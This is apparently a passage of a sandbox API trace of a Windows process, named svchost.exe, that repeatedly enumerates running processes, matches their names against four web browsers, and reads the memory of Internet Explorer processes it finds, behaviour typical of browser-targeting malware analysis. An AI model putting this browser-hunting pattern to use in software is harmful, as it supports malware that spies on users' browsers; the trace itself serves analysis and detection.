	[0234.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.330] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0234.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.330] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.331] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0234.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7354
	[0234.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.332] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0234.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.332] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.332] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0234.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.332] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.333] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0234.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7358
	[0234.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.333] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0234.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.334] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.334] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0234.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.334] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.334] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0234.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x735c
	[0234.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.335] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0234.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.336] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.336] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0234.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.337] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.337] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0234.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7360
	[0234.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.338] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0234.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.339] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.339] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0234.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.340] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.340] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0234.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7364
	[0234.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.341] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0234.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.342] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.342] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0234.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.342] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.343] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0234.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7368
	[0234.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.344] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0234.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.345] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.346] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0234.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.346] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0234.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x736c
	[0234.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.348] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0234.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.348] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.349] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0234.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.349] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.349] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7370
	[0234.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.350] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.351] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.351] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.351] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.352] NtQueryInformationProcess (in: ProcessHandle=0x7370, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.352] ReadProcessMemory (in: hProcess=0x7370, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.352] ReadProcessMemory (in: hProcess=0x7370, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.352] ReadProcessMemory (in: hProcess=0x7370, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.352] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7374
	[0234.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.353] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.353] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.353] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.354] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.354] NtQueryInformationProcess (in: ProcessHandle=0x7374, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.354] ReadProcessMemory (in: hProcess=0x7374, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.354] ReadProcessMemory (in: hProcess=0x7374, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.354] ReadProcessMemory (in: hProcess=0x7374, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.354] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7378
	[0234.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.355] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.356] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.356] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.356] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0234.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x737c
	[0234.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.357] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0234.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.358] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.358] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0234.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.358] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7380
	[0234.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.360] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.360] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.361] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.361] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.361] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7384
	[0234.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.363] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.364] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7388
	[0234.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.365] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.365] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.366] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.366] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.367] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x738c
	[0234.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.368] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.368] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.368] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.369] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0234.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x7390
	[0234.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.370] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.371] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.371] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.371] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7394
	[0234.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.372] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.373] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.373] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.373] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7398
	[0234.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.374] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.375] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.383] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.384] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0234.385] CloseHandle (hObject=0x4fd0) returned 1
	[0234.385] Sleep (dwMilliseconds=0x64) 
	[0234.488] GetCurrentProcessId () returned 0x110
	[0234.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0234.490] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0234.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0234.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0234.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x739c
	[0234.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.493] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.494] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.494] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.494] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x73a0
	[0234.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.495] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.496] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.496] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.497] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0234.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x73a4
	[0234.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.498] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0234.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.498] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.499] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0234.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.499] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
